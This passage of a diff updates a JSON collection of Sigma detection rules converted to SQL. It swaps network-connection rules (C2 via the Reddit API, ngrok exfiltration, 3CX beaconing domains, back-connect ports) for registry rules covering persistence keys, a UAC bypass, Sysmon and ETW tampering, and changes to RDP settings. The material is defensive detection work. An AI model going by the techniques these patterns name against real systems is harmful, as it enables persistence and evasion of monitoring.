"high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" }, { - "title": "Suspicious Non-Browser Network Communication With Reddit API", - "id": "d7b09985-95a3-44be-8450-b6eadf49833e", + "title": "Potential Attachment Manager Settings Attachments Tamper", 
+ "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", "status": "experimental", - "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", - "author": "Gavin Knapp", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1102" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate applications communicating with the Reddit API e.g. web browsers not in exclusion list, app with an RSS etc." + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%reddit.com/api%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ExpressConnectNetworkService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND 
NewValue = 'DWORD (0x00000001)')))" ], - "filename": "net_connection_win_reddit_api_non_browser_access.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Disable Sysmon Event Logging 
Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", + "status": "experimental", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Web Browsers" + "Legitimate driver altitude change to hide sysmon" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "PowerShell Network Connections", - "id": "1f21ec3f-810d-4b0e-8045-322202e22b4b", - "status": "experimental", - "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. 
extend filters with company's ip range')", - "author": "Florian Roth (Nextron Systems)", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "status": "test", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft IP range" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 
'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_powershell_network_connection.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", - "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "status": "test", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control" + "attack.persistence" ], 
"falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - 
"title": "Suspicious Typical Malware Back Connect Ports", - "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((NewProcessName LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE 
'\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "net_connection_win_malware_backconnect_ports.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE 
'%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_mal_adwind.yml" }, { - "title": "Excel Network Connections", - "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "status": "experimental", - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and 
attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1203" + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." 
+ "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_excel_outbound_network_connection.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", - "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "status": "test", + "description": "Detects the abuse of the exefile handler in new file association. 
Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "Persistence Via Disk Cleanup Handler - Autorun", + "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '3389' AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE 